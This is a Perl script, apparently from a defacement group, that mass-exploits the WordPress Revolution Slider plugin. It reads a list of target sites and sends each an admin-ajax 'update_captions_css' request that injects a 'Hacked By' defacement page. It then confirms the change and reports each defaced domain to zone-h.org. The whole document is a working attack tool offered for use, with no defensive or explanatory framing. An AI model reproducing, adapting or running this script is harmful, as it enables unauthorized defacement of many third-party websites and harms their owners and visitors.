[EXPLOIT] REVSLIDER ADMIN AJAX MASS EXPLOITER

#!/usr/bin/perl
#Mass Revslider Coded By Cyberdark DZ
#Recoded By ./MalingSendal - Trenggalek Cyber Army
#Greetz : CowoKerensTeam - Sanjungan Jiwa - SpyHackerZ - Sector Security Tester

use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);

print "          .                                                      .
        .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'          `98v8P'          `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX(
                      ,dXXXXXXXXXXXb     dXXXXXXXXXXXb.
                     dXXXXXXXXXXXP'   .   `9XXXXXXXXXXXb
                    dXXXXXXXXXXXXb   d|b   dXXXXXXXXXXXXb
                    9XXb'   `XXXXXb.dX|Xb.dXXXXX'   `dXXP
                     `'      9XXXXXX(   )XXXXXXP      `'
                              XXXX X.`v'.X XXXX
                              XP^X'`b   d'`X^XX
                              X. 9  `   '  P )X
                              `b  `       '  d'
                               `             '
                        -> Revslider Mass Exploiter <-\n";
print "List Target : ";
my $list=<STDIN>;
chomp($list);
  open (THETARGET, "<$list") || die "
Directory not found.";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;

foreach $site(@TARGETS){

chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };

$ajx = $site . 'wp-admin/admin-ajax.php';

$link = $site .'wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css';

print "Scan : $site\n";

$gassface = POST $ajx, [
'action' => 'revslider_ajax_action', 'client_action' => 'update_captions_css', 'data' =>"
<br><br><br><body style='color: transparent;background-color: white'><center><h1><b style='color: black'><center>Hacked By ./MalingSendal - Trenggalek Cyber Army<br>Greetz : CowoKerensTeam - Sanjungan Jiwa - SpyHackerZ - Sector Security Tester - And You<p style='color: transparent'>"];
$response = $ua->request($gassface);
$stat = $response->content;
    if ($stat =~ /true/){
print colored ("Vulnerability ",'Green'),"\n";
print "--> $link\nPost Zone-H\n";
zonpost();
}else{
print colored ("Not Vulnerability ",'red'),"\n";
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked|Fallag |Gassrini/){

                $dmn= $link;
                $def="Trenggalek Cyber Army";
                $zn="http://zone-h.org/notify/single";
                $lwp=LWP::UserAgent->new;
                $res=$lwp  -> post($zn,[
                'defacer'     => $def,
                'domain1'   => $dmn,
                'hackmode' => '15',
                'reason'       => '1',
                'submit'       => 'Send',
                ]);
                if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
                print colored ("Submited $1",'white on_green'),"\n";
                }
                else
                {
                print colored ("Error",'black on_white'),"\n";
                }
                     }else{
                        print" Not Defaced \n";
}
}